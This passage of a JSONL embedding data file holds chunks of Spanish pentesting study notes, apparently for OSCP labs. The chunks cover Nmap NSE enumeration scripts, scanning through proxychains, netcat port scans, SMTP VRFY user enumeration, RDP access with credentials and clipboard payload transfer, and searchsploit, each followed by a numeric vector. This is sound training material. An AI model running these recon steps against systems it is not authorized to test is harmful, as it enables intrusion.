0.01116, 0.02005, -0.02585, -0.07042, 0.02876, -0.02105, -0.0237, -0.01585, -0.00705, 0.00674, 0.01578, -0.03399, -0.0118, -0.03051, -0.03944, 0.10572, 0.03052, -0.00836, 0.0007, -0.05976, 0.01231, 0.05329, -0.01726, 0.0558, -0.03334, -0.04229, -0.07728, -0.02378, 0.06449, -0.04347, -0.01247, -0.01215, 0.04509, 0.04896, 0.02228, -0.02047, 0.00083, 0.02758, -0.02924, 0.06688, 0.02259, -0.02248, -0.03213, -0.08176, -0.03589, 0.0497, 0.00231, 0.00682, 0.01795, -0.04732, -0.04163, 0.00508, 0.04271, -0.02359, -0.09173, -0.06018, -0.03183, -0.04699, 0.0244, -0.01916, -0.03229, -0.02041, -0.02256, 0.00658, -0.09567, 0.0248, -0.08408]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "## Por servicio (muy rentable)\n```bash\nnmap -p80,443 --script http-enum,http-title,http-headers IP # web → Enumeración web\nnmap -p445 --script smb-os-discovery,smb-enum-shares,smb-enum-users IP # SMB\nnmap -p161 -sU --script snmp-info IP # SNMP\nnmap -p21 --script ftp-anon IP # FTP anónimo\nnmap --script vuln IP # barrido de vulns\n```", "v": [0.14652, -0.16199, -0.08829, -0.13067, -0.04087, -0.23636, -0.14711, -0.2334, -0.11077, 0.13317, 0.05454, -0.00128, 0.15541, -0.14321, -0.22185, 0.11692, -0.14133, -0.12074, 0.10363, 0.03179, -0.03468, 0.14852, -0.12709, -0.01071, -0.05083, 0.11534, -0.1454, 0.10394, -0.01934, -0.07284, 0.03626, -0.13295, -0.04048, -0.02657, -0.10324, -0.06522, 0.09503, 0.01259, 0.04376, 0.16963, -0.0257, 0.00338, -0.06239, 0.04788, 0.02295, -0.01479, 0.01382, -0.11199, 0.03412, -0.07714, -0.10558, -0.01614, -0.08232, 0.00541, -0.12855, 0.08354, 0.02461, -0.07808, -0.05149, 0.12142, -0.02189, 0.05817, -0.09299, -0.11693, 0.00232, -0.0772, -0.03933, -0.04705, -0.05197, -0.0071, -0.00276, -0.0375, -0.00034, 0.03935, 0.0872, 0.02859, -0.01721, -0.05684, 0.06493, 0.02652, 0.0319, -0.03379, -0.10467, -0.00938, -0.08708, -0.09716, 0.05894, -0.07854, -0.00634, -0.04577, 0.07293, 0.09597, 0.00311, 0.03061, -0.01115, -0.05236, -0.00439, 0.00321, 0.03361, -0.00977, -0.02797, 0.08282, -0.11391, 0.03975, 0.08417, 0.04262, 0.04795, 0.05772, 0.07037, 0.03838, 0.04164, 0.05361, -0.03984, -0.01646, -0.04675, -0.03314, -0.01104, -0.01419, 0.03101, -0.06557, -0.02417, -0.05376, 0.00123, 0.01681, -0.09674, 0.00879, 0.06283, 0.04711, 0.01269, 0.02471, -0.03378, -0.02586, -0.03764, -0.01982, 0.00765, 0.03643, 0.04437, 0.00074, -0.04698, 0.06758, -0.02553, 0.00722, -0.03644, 0.03127, 0.02816, -0.07392, -0.00159, -0.08407, 0.031, -0.02021, 0.06316, 0.00918, -0.04723, -0.01457, 0.00119, -0.01938, -0.01577, -0.04056, -0.04689, 0.0065, -0.02192, 0.02805, 0.036, 0.01726, 0.01181, 0.02599, -0.00687, -0.00991, 0.02683, -0.04093, 0.0099, 0.02136, -0.00403, -0.0695, 0.06794, -0.07965, -0.01305, 0.02153, -0.02547, -0.03175, -0.00717, -0.04735, 0.0071, 0.03062, -0.01793, -0.02861, 0.04192, -0.00803, -0.02697, -0.04812, 0.07066, -0.02256, -0.03807, 0.00108, 0.00777, -0.02544, -0.0423, -0.05501, -0.0069, -0.04066, -0.05648, -0.00182, -0.04195, -0.00974, -0.01707, -0.03844, 0.0002, 0.01037, -0.02268, -0.0213, 0.04743, -0.00084, 0.02857, -0.03813, -0.02948, -0.02445, 0.00953, 0.04326, -0.00367, -0.02213, 0.01936, 0.0417, 0.00241, -0.01599, 0.00159, -0.04121, -0.00264, -0.03259, -0.00837, -0.01141, -0.0354, -0.00233, -0.02168, -0.01354, 0.03594, -0.0344, -0.03011, 0.01151, 0.014, -0.01508, -0.02491, -0.02207, -0.03884, -0.02285, -0.03542, -0.04195, -0.0538, 0.027, -0.03069, -0.00098, -0.01424, -0.09209, -0.06128, -0.02649, -0.03552, 0.04822]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "## Gestionar scripts\n```bash\nnmap --script-help http-enum # qué hace un script\nls /usr/share/nmap/scripts | grep smb # listar los disponibles\n```", "v": [0.16548, -0.07114, -0.04109, -0.1591, -0.00089, -0.25376, -0.19833, -0.12599, -0.00638, 0.06333, -0.08465, -0.03783, 0.12438, -0.14015, -0.05855, 0.04713, -0.13736, -0.02693, 0.004, 0.13754, 0.08773, 0.13294, -0.00931, 0.0362, -0.14223, -0.06133, -0.02218, -0.02252, -0.14683, 0.00191, -0.02957, -0.00737, -0.00681, -0.1156, -0.02446, 0.02097, 0.0277, -0.01833, 0.05169, 0.25219, -0.0726, 0.03705, -0.0803, 0.08057, 0.02948, -0.15272, 0.04932, -0.01055, 0.0149, -0.09201, -0.01356, 0.03482, -0.10732, 0.00838, -0.05307, 0.07672, 0.00352, -0.16071, -0.10231, 0.10495, -0.06774, -0.03433, -0.00812, -0.053, 0.01757, 0.02317, 0.0413, -0.18745, -0.0938, 0.02049, -0.08415, 0.07029, -0.03434, 0.02841, 0.05946, 0.0402, -0.03091, -0.06444, 0.04173, 0.01483, -0.01086, -0.09869, -0.02043, 0.02333, 0.00292, -0.18646, -0.00438, -0.0045, -0.10112, -0.05645, 0.09657, 0.00984, -0.02287, -0.00163, 0.01468, -0.0667, 0.00367, -0.00529, 0.08916, 0.04704, -0.05666, -0.01166, -0.06353, 0.0795, 0.02127, 0.09675, 0.06853, 0.07792, 0.00927, 0.04811, 0.09871, 0.06757, -0.0002, 0.02209, -0.04576, -0.01331, -0.02656, 0.0271, 0.00514, -0.06605, -0.03138, 0.01659, -0.00572, -0.00365, -0.02552, -0.01281, 0.05134, 0.04479, -0.01876, 0.05664, -0.16623, -0.04115, -0.0397, -0.05293, -0.06634, 0.0871, 0.07083, 0.03376, -0.06507, -0.00199, 0.00601, 0.04896, 0.04659, 0.04652, 0.0127, -0.07639, 0.00778, -0.06547, 0.01548, -0.01121, 0.06231, 0.02413, -0.05459, 0.00135, 0.06402, -0.08461, 0.02891, -0.01099, -0.06723, -0.02702, 0.00517, -0.0262, -0.07172, 0.07914, 0.01703, 0.02396, 0.00071, 0.02344, 0.01507, 0.01856, 0.0354, 0.01067, 0.02452, -0.05056, 0.03915, -0.05679, 0.05529, -0.03439, -0.04077, -0.05017, 0.01804, -0.01271, 0.0163, 0.06784, -0.02, -0.03943, 0.01969, -0.00112, -0.02178, 0.0382, 0.00837, 0.03392, -0.04264, -0.03697, -0.01448, 0.00335, -0.03841, -0.03577, 0.02649, 0.01784, -0.06153, 0.0543, 0.02394, -0.03151, 0.04226, -0.00018, -0.04663, 0.00443, -0.0479, -0.02612, 0.02232, 0.02938, 0.01518, 0.01115, -0.0176, -0.05585, -0.00863, 0.04633, 0.02134, -0.09066, 0.01489, 0.02414, 0.02753, -0.04535, -0.01116, -0.0023, 0.03919, -0.0057, -0.01168, 0.03487, -0.0091, -0.03528, -0.02781, 0.01008, 0.01064, -0.03926, -0.03936, 0.00693, -0.00096, -0.03206, -0.01998, 0.03735, -0.02231, -0.08667, -0.05733, -0.03042, -0.05903, -0.00705, 0.0137, 0.00146, -0.00628, -0.04847, -0.01171, -0.01605, -0.00692, 0.00657]} +{"tipo": "metodologia", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "texto": "## A través de un túnel\n`proxychains nmap ...` (de tu history) para escanear la red interna tras Pivoting ligolo-ng (usa `-sT -Pn`, SYN no pasa por proxychains).\n\nRelacionado: searchsploit · Puertos olvidados · OSCP MOC", "v": [0.01208, -0.16464, -0.1241, -0.05422, 0.12803, -0.13103, 0.04903, -0.15722, -0.06172, 0.14067, 0.03613, 0.09574, 0.10782, -0.02429, -0.1207, -0.0774, -0.1117, 0.0647, 0.15964, 0.02291, -0.21926, 0.03319, -0.12663, -0.02268, 0.14045, 0.14566, -0.0055, -0.04232, -0.07372, -0.06071, -0.12745, -0.01282, 0.0968, 0.04219, -0.04229, -0.02478, 0.09276, 0.0585, 0.11, 0.20877, -0.07835, -0.02794, -0.11006, 0.13472, 0.12651, -0.14385, -0.0304, -0.01574, -0.03427, -0.04145, -0.07991, -0.07474, -0.23083, 0.06172, 0.04582, 0.00237, 0.00152, -0.01666, -0.053, 0.00669, 0.01974, -0.02852, 0.0007, -0.07097, -0.01895, -0.00861, 0.00591, 0.04421, -0.10471, 0.04674, -0.08041, 0.02063, 0.02604, 0.0912, 0.02065, -0.08619, 0.03722, -0.02385, 0.11233, 0.14057, -0.04094, -0.00668, -0.00573, -0.03889, -0.03012, 0.00014, -0.01628, 0.02566, 0.11269, -0.01012, 0.0949, 0.02229, 0.00753, 0.04325, 0.09588, -0.02178, -0.04097, -0.01472, 0.02121, -0.04522, 0.00702, 0.07751, -0.02994, 0.08392, 0.01484, 0.05577, 0.00185, 0.03983, 0.08575, 0.08197, 0.18094, 0.00293, 0.03921, -0.08451, -0.01227, 0.0299, -0.00146, 0.02607, 0.0095, -0.07948, -0.01222, -0.00643, 0.01149, -0.00042, -0.07437, -0.0064, 0.01699, 0.00564, 0.05276, 0.07396, -0.05112, -0.01468, -0.06715, -0.08413, -0.03741, 0.01675, 0.10487, -0.03977, 0.0346, 0.02784, -0.00545, -0.02498, -0.06425, -0.00345, 0.05764, 0.07649, 0.00041, -0.03304, -0.01085, -0.00958, -0.03404, -0.01035, -0.05695, -0.03582, 0.00676, -0.04311, 0.00455, -0.06858, -0.01769, 0.03189, 0.05729, 0.02318, 0.00124, 0.00657, 0.03285, -0.01845, -0.02077, -0.04626, -0.01251, -0.08545, -0.02175, -0.00076, -0.07393, -0.06492, -0.06014, -0.03638, -0.00034, -0.0679, -0.03418, -0.0222, -0.00838, -0.07866, -0.02533, 0.04579, -0.03431, -0.06641, 0.05222, -0.0126, 0.0086, 0.00105, 0.00807, -0.09378, 0.02497, 0.05154, 0.04123, 0.04867, 0.00939, -0.09414, 0.00337, -0.03678, -0.01564, 0.00125, 0.00788, 0.00916, -0.00823, -0.03481, -0.00476, -0.01258, 0.00103, 0.02022, 0.06014, -0.04651, 0.00539, 0.03461, -0.00593, 0.00481, -0.03581, 0.02225, -0.03943, -0.02697, -0.05367, 0.05351, 0.01937, 0.03813, -0.02342, -0.02131, -0.02032, 0.00286, -0.05013, -0.04675, -0.00913, 0.0103, -0.03924, -0.03855, 0.02918, 0.01518, -0.0197, -0.00044, -0.00516, 0.00623, 0.01994, 0.00349, -0.02106, 0.0516, -0.07639, -0.05511, 0.00636, 0.01387, 0.02016, -0.00041, 0.00838, -0.02243, -0.05041, -0.07114, 0.04802, 0.02506]} +{"tipo": "metodologia", "herramienta": "Netcat", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "texto": "# Netcat (recon)\n\n> Solo para protocolos de **texto**: SMTP, HTTP, POP3... Para shells ver Reverse shell y Egress filtering.", "v": [0.03735, -0.16537, -0.08641, -0.15836, -0.00868, -0.12104, 0.03608, -0.10735, 0.17578, 0.14825, -0.15929, 0.11863, 0.10651, -0.07235, 0.03547, 0.07311, -0.07531, -0.04053, 0.08001, -0.04885, -0.05993, 0.00052, -0.14591, -0.12365, 0.08912, 0.06803, -0.0378, 0.14361, -0.01318, -0.0542, -0.00941, -0.09909, -0.07438, 0.02395, -0.13431, 0.02296, 0.02782, 0.0227, 0.00984, 0.10915, 0.01722, 0.08003, -0.09235, 0.11344, -0.00493, -0.09607, 0.04859, -0.12929, 0.05728, -0.01149, -0.10152, 0.06929, -0.24101, 0.11498, -0.09946, 0.09921, 0.12422, -0.0396, -0.02325, -0.03924, -0.02522, -0.04341, 0.07643, -0.07533, 0.04852, -0.05022, 0.01373, -0.01908, -0.1572, 0.10759, -0.00436, 0.05246, 0.09167, -0.03601, 0.05885, -0.00621, -0.03422, -0.01716, 0.05645, 0.08878, -0.05129, -0.05801, -0.0535, 0.04596, -0.05073, -0.03987, -0.08965, -0.09422, -0.00492, -0.08534, 0.03906, 0.02166, -0.05288, -0.01658, -0.02106, -0.10435, -0.06969, -0.00713, -0.02101, 0.05732, -0.07364, -0.01863, -0.0457, 0.09071, 0.00447, -0.01488, 0.02737, -0.02893, 0.02121, -0.04699, -0.01446, -0.04945, -0.00982, -0.00723, 0.05669, -0.0295, 0.00907, 0.02389, 0.07449, -0.08812, 0.01062, -0.07945, -0.0456, -0.01589, 0.00502, 0.02058, -0.01881, 0.07064, 0.04167, -0.02436, 0.00832, 0.0521, -0.07003, -0.04641, -0.00725, 0.02516, 0.06006, -0.00138, 0.00283, -0.00597, -0.02158, 0.01814, -0.15333, 0.0848, 0.06422, 0.03229, 0.05661, -0.05676, -0.09629, 0.02651, 0.0687, 0.05581, -0.08286, -0.00453, -0.06302, -0.01885, -0.00915, -0.03194, -0.0464, 0.0142, 0.03842, -0.00661, 0.03131, 0.04444, -0.01597, 0.10762, -0.11419, -0.01668, 0.03421, -0.054, 0.00771, 0.02042, -0.04114, -0.04228, -0.0394, -0.05408, -0.03207, 0.00685, -0.00143, -0.00664, 0.05148, -0.02748, 0.02071, -0.04971, -0.01033, -0.06076, 0.04649, 0.01248, -0.0076, -0.02562, 0.01575, -0.01757, -0.06246, 0.05117, 0.0442, 0.022, -0.03469, -0.10163, -0.03019, -0.00023, -0.04229, 0.02463, 0.06282, -0.10895, -0.01292, -0.01211, 0.00754, -0.04369, -0.0148, -0.03984, 0.00478, 0.00066, 0.03356, 0.04142, -0.03545, -0.00337, 0.01862, 0.03729, 0.02544, 0.08206, -0.0247, 0.02138, -0.00117, 0.01929, 0.02462, -0.01059, 0.02014, -0.10672, 0.04558, -0.05423, -0.02245, -0.01817, -0.00443, -0.03759, -0.00174, 0.00822, -0.02348, 0.01535, -0.03576, -0.01944, -0.01261, 0.00068, -0.02417, -0.01658, 0.0094, -0.00546, -0.09699, -0.01664, -0.01135, 0.01294, -0.1086, -0.0597, -0.02525, -0.06471, -0.01915, -0.05166]} +{"tipo": "metodologia", "herramienta": "Netcat", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "texto": "## Conexión y escaneo\n```bash\nnc -nv IP PUERTO # interactivo (host y puerto con ESPACIO, NO \":\")\nnc -nvz IP 1-1000 # modo scan (-z): solo comprueba si abre\nnc -nvz -u IP 161 # UDP (poco fiable → mejor SNMP dedicado)\n```\n- **OJO**: `nc IP:PUERTO` = MAL. `-p` es puerto **origen**, no destino.\n- SNMP/SMB/DNS son **binarios** → netcat NO sirve, usa la herramienta dedicada.", "v": [-0.05138, -0.18554, -0.18918, -0.04814, 0.03386, -0.23215, -0.06925, -0.1825, -0.20811, 0.06181, 0.06185, -0.08253, 0.06226, -0.17387, -0.25671, 0.06549, -0.07811, 0.00877, 0.06245, 0.12852, -0.13648, 0.09493, -0.05175, -0.04418, 0.03535, 0.12259, -0.17871, 0.1299, -0.08151, 0.03802, -0.02284, -0.05369, -0.05165, -0.03224, -0.01507, -0.11925, 0.05721, 0.00208, 0.00481, 0.12458, -0.00252, 0.08619, -0.09136, 0.0338, 0.11605, -0.05613, -0.02344, -0.02079, -0.00982, -0.09915, -0.01527, -0.04512, -0.11104, -0.04024, -0.09551, 0.05247, 0.09707, 0.08508, 0.01959, -0.0467, -0.00964, 0.04288, -0.02593, -0.14375, -0.00315, -0.05853, -0.01366, -0.02778, -0.10912, -0.04603, -0.04101, 0.02382, 0.04761, -0.012, 0.05762, -0.0086, 0.04559, -0.02791, 0.1106, 0.02792, 0.00449, 0.02126, -0.11365, -0.04727, -0.08464, -0.04072, 0.10009, -0.10108, -0.01215, -0.06673, 0.08291, 0.01088, -0.00023, 0.0778, 0.04013, -0.04712, 0.02289, 0.05993, 0.06691, 0.00779, 0.10803, 0.12749, -0.12928, 0.02149, 0.05493, 0.04695, 0.078, 0.00881, 0.06976, 0.0329, 0.02971, 0.01358, -0.02818, -0.06947, 0.02907, -0.03529, -0.05729, -0.03554, 0.00933, -0.02825, -0.00542, -0.02225, -0.00913, 0.03297, -0.02286, -0.04425, 0.03059, 0.0453, 0.07255, -0.04159, 0.01551, -0.05171, -0.03146, -0.00772, 0.02052, 0.00626, 0.05713, -0.08248, 0.0086, 0.00574, 0.02801, -0.00403, -0.02929, 0.00276, 0.05913, 0.01792, -0.00607, -0.09848, -0.06375, 0.02688, 0.09687, 0.03622, 0.00063, 0.01401, -0.02162, 0.02739, 0.03536, -0.04672, -0.02778, 0.04365, 0.01507, 0.0233, 0.10088, 0.07149, 0.01113, 0.01256, -0.05395, -0.01357, 0.01586, -0.05697, -0.03276, 0.01664, -0.0204, -0.01481, -0.0233, -0.05333, 0.04074, -0.02778, 0.00383, -0.02748, -0.0011, -0.03614, 0.03433, 0.01243, -0.02313, -0.03231, 0.03703, -0.05207, 0.03709, 0.00037, 0.08187, 0.01516, -0.04271, 0.00443, 0.01625, -0.02616, -0.024, -0.11717, -0.01449, 0.00315, -0.06127, 0.01314, -0.01031, -0.02491, 0.00275, 0.02345, -0.0389, 0.02425, -0.05583, 0.01565, -0.00206, -0.05419, 0.04091, -0.03344, -0.06322, -0.0182, -0.01941, 0.03874, 0.03343, 0.03447, -0.02159, 0.04585, -0.01373, 0.01616, 0.0115, -0.00996, 0.03547, -0.00129, 0.05626, -0.00855, -0.01751, 0.02584, -0.01371, -0.05263, 0.0529, -0.00331, -0.01555, 0.01281, -0.04205, -0.02596, -0.02705, -0.00574, -0.04083, -0.03925, -0.00082, -0.04639, -0.04326, 0.02616, 0.00356, -0.02928, 0.01479, -0.02885, 0.0039, -0.05451, 0.01037, 0.00304]} +{"tipo": "metodologia", "herramienta": "Netcat", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Netcat.md", "texto": "## SMTP a mano (enumerar usuarios)\n```bash\nnc -nv IP 25\nVRFY root # 250 existe / 252 Postfix no confirma / 550 no existe\nQUIT\n```\n\nRelacionado: Operadores Bash · Enumeración · OSCP MOC", "v": [-0.28491, -0.1401, -0.09339, -0.0656, -0.01617, -0.22111, -0.00511, -0.05264, -0.10712, 0.05117, 0.01682, -0.1464, 0.16107, -0.08121, 0.02497, 0.02456, -0.09029, -0.00944, 0.0899, 0.04161, -0.02706, 0.00615, -0.0847, 0.04249, 0.08109, 0.20371, -0.1349, 0.04542, -0.04941, -0.03947, 0.08783, -0.1591, -0.05473, 0.06514, -0.07228, 0.06645, -0.0728, -0.03133, 0.01402, 0.18127, -0.01355, -0.00543, -0.09882, 0.10089, 0.14451, -0.02078, 0.02089, -0.06759, 0.03069, -0.13468, -0.06353, -0.12866, -0.08993, -0.03223, -0.14289, -0.03502, 0.11943, -0.03214, -0.00745, 0.03771, -0.00848, 0.01657, -0.0666, -0.16447, -0.02948, 0.02566, -0.05655, -0.06049, -0.03431, 0.07402, -0.06161, 0.12521, -0.00407, 0.02621, 0.05894, 0.03149, 0.12825, -0.03195, 0.02328, 0.06675, -0.04314, -0.03691, -0.07122, -0.03317, -0.05105, -0.06216, 0.07938, -0.02773, -0.07914, 0.01805, 0.08258, 0.12142, -0.01024, 0.00492, 0.07847, -0.08783, 0.00513, -0.08709, 0.07853, -0.11494, 0.08296, 0.10766, -0.08665, 0.0405, 0.04291, -0.03002, 0.1841, 0.04463, 0.05762, 0.0163, 0.02485, -0.02282, 0.03748, -0.07998, -0.06659, -0.01362, -0.0275, 0.00269, 0.0381, 0.00274, -0.00864, 0.02165, 0.07064, 0.033, -0.02772, -0.01403, 0.02835, 0.07539, 0.0035, -0.03841, 0.02254, -0.02504, 0.03835, -0.06393, -0.04203, -0.04314, -0.01052, -0.05657, 0.05999, -0.01599, 0.0288, 0.03379, -0.0498, 0.06867, -0.00419, -0.01266, -0.03022, 0.04632, -0.0592, -0.00593, 0.06047, -0.01545, -0.05253, 0.02138, 0.05573, 0.03122, -0.0167, 0.0028, -0.01858, 0.01793, 0.00883, -0.02703, 0.02876, -0.00597, -0.04792, 0.01425, -0.01272, 0.00291, -0.03641, 0.00578, 0.01226, -0.01876, -0.07259, 0.01773, 0.00864, -0.01022, 0.02895, -0.04201, -0.00218, 0.02627, 0.08708, -0.05518, 0.05862, -0.01289, 0.08138, 0.00168, 0.04848, -0.00601, -0.01453, -0.00696, 0.02428, -0.01667, 0.0015, -0.03779, 0.00862, 0.00563, 0.06614, -0.10056, 0.01421, -0.00037, 0.01155, -0.03585, -0.01459, 0.01335, 0.04961, -0.06156, 0.01842, -0.05921, -0.00515, -0.04394, 0.01618, 0.00181, -0.04803, 0.03087, -0.01494, -0.02506, -0.01608, 0.03817, 0.05759, -0.01069, -0.08679, 0.01817, 0.03209, 0.03641, -0.00363, 0.02903, -0.04823, -0.01567, 0.02445, -0.00398, -0.02771, -0.02404, -0.02476, -0.06657, 0.03989, 0.0049, -0.00559, 0.02191, 0.01943, 0.03042, -0.01339, 0.01649, -0.00902, -0.02169, -0.03604, -0.02506, -0.01114, -0.01814, -0.0108, 0.01353, -0.00208, -0.02999, 0.00888, -0.01181, -0.00356, 0.02521]} +{"tipo": "metodologia", "herramienta": "RDP", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legítimo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versión nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "v": [0.10287, -0.1015, -0.1549, -0.14824, 0.05531, -0.24696, -0.02385, 0.01477, 0.04835, -0.01902, -0.01177, -0.17481, -0.07382, -0.14061, 0.01105, 0.00395, -0.12407, 0.03375, 0.02914, 0.03831, 0.06334, 0.03804, -0.11477, -0.08759, -0.00867, 0.09939, -0.0703, 0.09656, -0.07925, -0.02005, -0.02811, 0.00085, -0.06014, -0.01351, -0.09584, 0.02507, 0.00459, 0.09147, -0.04739, 0.21395, 0.09826, 0.10584, -0.11874, 0.09646, 0.08371, -0.10582, 0.09338, 0.06052, 0.00445, 0.0115, -0.01493, -0.07512, -0.07335, 0.01055, -0.02075, 0.06784, 0.20891, -0.05287, 0.01273, 0.02048, -0.03582, 0.10321, -0.01158, -0.08002, 0.0393, -0.03009, 0.03913, -0.07529, -0.11567, 0.11608, -0.04038, -0.04198, 0.02493, -0.03232, 0.00853, -0.06253, -0.07916, -0.1552, 0.10268, 0.11774, -0.00927, -0.05648, -0.04077, -0.06774, 0.01048, -0.16306, 0.03899, -0.11469, -0.03267, -0.01925, 0.15278, 0.01087, -0.04039, 0.00298, 0.04182, -0.15204, 0.04709, 0.00337, -0.00156, -0.0001, -0.02236, 0.06415, -0.03158, 0.05145, 0.05757, 0.05594, 0.00923, 0.01498, 0.03833, 0.03826, 0.07623, -0.00375, 0.0033, -0.01697, 0.00351, -0.05076, -0.06469, -0.028, 0.06421, -0.02675, 0.02887, -0.02652, -0.05835, -0.02264, -0.00473, -0.01679, -0.0051, 0.12455, -0.02981, -0.01919, 0.00194, 0.01562, -0.00285, -0.06292, -0.04217, 0.02207, 0.00783, -0.04023, -0.03018, -0.01829, 0.08986, 0.10373, 0.03765, 0.02249, 0.02997, 0.01156, -0.00891, -0.02542, -0.08262, -0.01198, -0.00074, 0.0522, 0.00151, 0.03208, -0.04372, -0.07249, 0.08332, -0.01271, -0.0259, 0.02758, -0.00979, 0.00509, -0.01915, 0.05119, 0.00943, 0.01861, -0.0245, 0.01646, -0.01754, 0.0217, 0.01922, -0.01021, -0.05064, -0.07331, 0.02945, -0.0781, 0.05648, -0.06561, 0.00077, -0.05627, -0.04652, 0.06547, -0.01355, -0.01819, 0.02896, 0.03358, 0.01822, 0.08008, 0.03721, 0.01945, 0.03442, 0.03149, -0.00644, -0.02188, 0.02153, -0.02016, -0.03543, -0.11747, 0.01, 0.02124, -0.04219, 0.0052, -0.0229, -0.07762, 0.0227, -0.04814, -0.05437, 0.08334, -0.05125, -0.0082, 0.03231, -0.03499, 0.04929, -0.03485, -0.03201, -0.02598, 0.00886, 0.06874, -0.01968, -0.03161, 0.0151, 0.07556, 0.01162, 0.00655, -0.0065, -0.01483, 0.00983, -0.02716, 0.01839, 0.00081, -0.0223, 0.11085, -0.00613, -0.01662, 0.03183, -0.01661, 0.00872, -0.00453, -0.07152, -0.09183, 0.00197, 0.05039, -0.04913, -0.11762, -0.09559, -0.00999, -0.05376, -0.00408, 0.0141, -0.06863, -0.02755, -0.01845, -0.02671, -0.06927, -0.00063, -0.01184]} +{"tipo": "metodologia", "herramienta": "RDP", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "texto": "## Cuándo\n- Cuando consigues credenciales válidas (reutilización, Mimikatz, GPP cpassword) y la máquina expone 3389.\n- GUI cómoda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB · Movimiento lateral · OSCP MOC", "v": [-0.1995, -0.22327, -0.11064, -0.0514, 0.08586, -0.16681, -0.0385, 0.02822, -0.09571, -0.11192, 0.02635, 0.08391, 0.0696, -0.05162, 0.00534, 0.02549, 0.02177, -0.01152, -0.06253, 0.09631, 0.06564, -0.02832, -0.05008, -0.01622, 0.05818, 0.2686, 0.10305, -0.0565, -0.08193, -0.09023, 0.02524, 0.0443, -0.16546, -0.07169, -0.05495, -0.03611, -0.06537, 0.03303, 0.01769, 0.14429, -0.00949, 0.1372, -0.12499, 0.06796, 0.19291, -0.17909, 0.14591, 0.06296, -0.03242, 0.03059, -0.17837, 0.01726, -0.06587, -0.0451, -0.02891, -0.00187, 0.12024, 0.01597, -0.08878, 0.01405, -0.05173, 0.09257, -0.02654, 4e-05, 0.03008, -0.09372, 0.00837, 0.02233, -0.0208, 0.10712, -0.06689, 0.04685, 0.03046, -0.01799, 0.05525, -0.07792, 0.02165, -0.01346, 0.18278, 0.07254, 0.04792, 0.00271, -0.07375, 0.01638, 0.05011, -0.02619, -0.00557, -0.10008, -0.01517, -0.03903, 0.10087, 0.00144, -0.07248, 0.00968, 0.0026, -0.0885, -0.11369, -0.00559, -0.02672, 0.01856, 0.01932, -0.01688, -0.10221, 0.05053, -0.01013, 0.00302, 0.05687, 0.02667, 0.02507, -0.02935, 0.09182, 0.00656, -0.02728, -0.0064, 0.00231, 0.03027, 0.01878, -0.06233, -0.01996, -0.08088, -0.00112, 0.02125, 0.0146, -0.07753, -0.066, 0.05938, -0.05233, 0.12966, -0.07438, -0.01112, 0.01472, -0.087, 0.01037, -0.0563, -0.059, 0.02308, 0.07426, -0.08294, 0.00694, -0.12786, 0.0371, -0.00595, -0.04314, 0.02884, 0.02087, 0.00924, 0.06078, -0.01954, 0.02829, 0.02472, 0.09009, -0.016, 0.01714, -0.02272, 0.0033, 0.08154, 0.04114, 0.0839, -0.0351, -0.00465, 0.04558, 0.01778, -0.06231, -0.02352, 0.00045, 0.04373, 0.0429, 0.05341, -0.02949, -0.05337, 0.00539, -0.04052, -0.07021, 0.02126, 0.02311, -0.06583, 0.06702, 0.01853, -0.04281, -0.04761, 0.00616, -0.0012, 0.02761, 0.00933, 0.01427, -0.03378, 0.02129, 0.01016, 0.01829, -0.05279, -0.03509, -0.01171, 0.02429, -0.044, 0.08988, -0.02537, -0.00949, -0.04335, -0.03377, -0.01658, -0.02176, -0.00059, -0.00212, 0.00776, 0.0597, -0.00656, 0.0227, 0.03506, -0.0087, -0.02424, 0.03507, -0.007, 0.0391, -0.0671, 0.00746, -0.0335, -0.02598, 0.0294, 0.01358, -0.03583, -0.00726, 0.0282, 0.04071, 0.01766, 0.02509, -0.05018, -0.02076, -0.02819, -0.0507, -0.04793, 0.02574, 0.03512, 0.03522, -0.02764, 0.02284, -0.02135, -0.02559, -0.03126, -0.04124, -0.03921, 0.01809, 0.00891, 0.04202, -0.02088, -0.04629, 0.02422, -0.00753, -0.05168, -0.03577, -0.0057, -0.02547, -0.04974, 0.01565, -0.08024, 0.00597, 0.02792]} +{"tipo": "metodologia", "herramienta": "searchsploit", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotación. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "v": [0.03468, -0.1255, -0.19908, -0.11812, -0.05096, -0.24723, 0.02947, 0.07878, -0.04447, -0.03733, -0.03078, -0.1484, 0.01718, 0.01926, -0.1145, -0.07759, 0.03944, -0.0937, -0.0093, -0.07877, -0.058, 0.12234, -0.01612, 0.01717, -0.02689, 0.03156, -0.04232, 0.16934, -0.01063, 0.04906, -0.04922, 0.08548, -0.01977, 0.00656, -0.00505, -0.09415, 0.13275, -0.06694, 0.0345, -0.04113, -0.01955, 0.059, -0.10239, 0.08352, -0.02469, -0.09287, -0.04572, -0.11432, -0.09188, -0.05206, -0.2241, -0.05374, -0.12789, -0.12728, 0.03056, -0.1149, 0.10296, -0.07192, 0.10888, 0.05044, 0.05914, -0.17337, -0.10615, -0.12445, 0.02818, -0.01742, 0.17568, -0.02703, 